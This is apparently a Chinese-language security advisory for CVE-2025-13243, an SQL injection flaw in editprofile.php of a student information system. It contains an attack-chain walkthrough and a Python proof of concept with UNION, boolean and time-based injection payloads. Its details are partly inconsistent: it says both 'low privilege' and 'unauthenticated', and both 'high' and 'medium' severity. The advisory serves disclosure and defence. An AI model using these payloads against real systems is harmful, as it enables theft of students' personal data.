CVE-2025-13243 code-projects Student Information System 2.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13243

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Student Information System 2.0

漏洞概述

CVE-2025-13243是code-projects开源项目Student Information System 2.0版本中的一个高危SQL注入漏洞。该漏洞存在于editprofile.php文件中的未知功能模块，攻击者可通过构造恶意SQL语句实现对数据库的未授权访问和操作。作为一个学生信息管理系统，该系统通常存储大量敏感的学生个人信息、成绩数据、考勤记录等重要数据。漏洞的CVSS评分为6.3，属于中等严重程度，但考虑到学生信息系统的敏感性和数据重要性，其实际危害不容忽视。攻击者可利用此漏洞获取数据库中的学生个人信息、成绩数据，甚至可能获取系统管理员权限。该漏洞已于2025年11月16日披露，且相关利用代码已被公开，攻击者无需高级技术能力即可发起攻击，对使用该系统的教育机构构成严重安全威胁。

技术细节

该SQL注入漏洞位于Student Information System 2.0的editprofile.php文件中的用户资料编辑功能模块。漏洞根源在于该功能模块对用户输入的profile参数缺乏有效的输入验证和SQL语句参数化处理。攻击者可利用UNION SELECT、布尔盲注、时间盲注等SQL注入技术绕过认证机制，获取数据库中的敏感信息。在SQL注入攻击中，攻击者通常通过在HTTP请求中注入恶意的SQL片段，如在profile参数后添加单引号(')、UNION语句或条件判断语句，来改变原本SQL查询的逻辑结构。由于应用层未对特殊字符进行过滤或转义，攻击者注入的SQL代码会被数据库服务器作为合法指令执行，从而实现数据窃取、权限提升或数据篡改等恶意操作。该漏洞需要低权限认证，但攻击者可利用获取的信息进一步扩大攻击面，最终可能导致整个学生信息数据库泄露。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标系统，发现运行Student Information System 2.0的Web服务器，并识别editprofile.php端点

STEP 2

步骤2

初始访问：攻击者使用低权限账号登录系统，访问editprofile.php文件中的用户资料编辑功能

STEP 3

步骤3

漏洞探测：攻击者向profile参数注入SQL特殊字符（如单引号），观察数据库错误响应，确认SQL注入漏洞存在

STEP 4

步骤4

数据提取：利用UNION注入或布尔盲注技术，从数据库中提取学生个人信息、成绩数据、用户凭证等敏感数据

STEP 5

步骤5

权限提升：基于获取的数据库信息，攻击者可能获取管理员账号密码哈希，进一步控制整个系统

STEP 6

步骤6

持久化控制：攻击者在数据库中植入后门账户或修改现有账户权限，建立持久化访问通道

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13243 SQL Injection PoC
# Target: Student Information System 2.0 (/editprofile.php)
# Vulnerability: Unauthenticated SQL Injection in profile parameter

import requests
import sys

target_url = "http://target-server/editprofile.php"

# Basic SQL Injection test payload
sql_payload = "' OR '1'='1"

# UNION-based data extraction payload
union_payload = "' UNION SELECT 1,2,3,4,5,6,7,8,9,10--"

# Time-based blind SQL injection payload
time_payload = "'; SLEEP(5)--"

def test_basic_injection():
    """Test basic SQL injection vulnerability"""
    data = {
        'profile': sql_payload,
        'submit': 'Update'
    }
    try:
        response = requests.post(target_url, data=data, timeout=10)
        if 'error' not in response.text.lower() or response.status_code != 500:
            print("[+] Basic injection test completed")
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")

def extract_database_info():
    """Extract database version and user information"""
    payloads = [
        "' UNION SELECT @@version,user(),database(),4,5,6,7,8,9,10--",
        "' UNION SELECT table_name,2,3,4,5,6,7,8,9,10 FROM information_schema.tables--"
    ]
    for payload in payloads:
        data = {'profile': payload, 'submit': 'Update'}
        try:
            response = requests.post(target_url, data=data, timeout=10)
            print(f"[+] Payload sent: {payload[:50]}...")
        except requests.RequestException:
            pass

if __name__ == "__main__":
    print("CVE-2025-13243 SQL Injection PoC")
    print("Target: Student Information System 2.0")
    test_basic_injection()
    extract_database_info()

影响范围

code-projects Student Information System 2.0

防御指南

临时缓解措施

在生产环境中，可暂时禁用editprofile.php功能或将其访问权限限制为管理员级别。同时建议部署Web应用防火墙规则来检测和阻断常见的SQL注入攻击模式（如单引号、UNION、注释符等）。此外，应立即审查数据库访问日志，排查是否存在异常查询行为，并对现有用户密码进行强制重置以防凭证泄露。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13243
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13243
3 Details https://www.cvedetails.com/cve/CVE-2025-13243/
4 VulDB https://vuldb.com/cve/CVE-2025-13243
5 Link https://code-projects.org/
6 Link https://github.com/asd1238525/cve/blob/main/SQL15.md
7 Link https://vuldb.com/?ctiid.332569
8 Link https://vuldb.com/?id.332569
9 Link https://vuldb.com/?submit.687528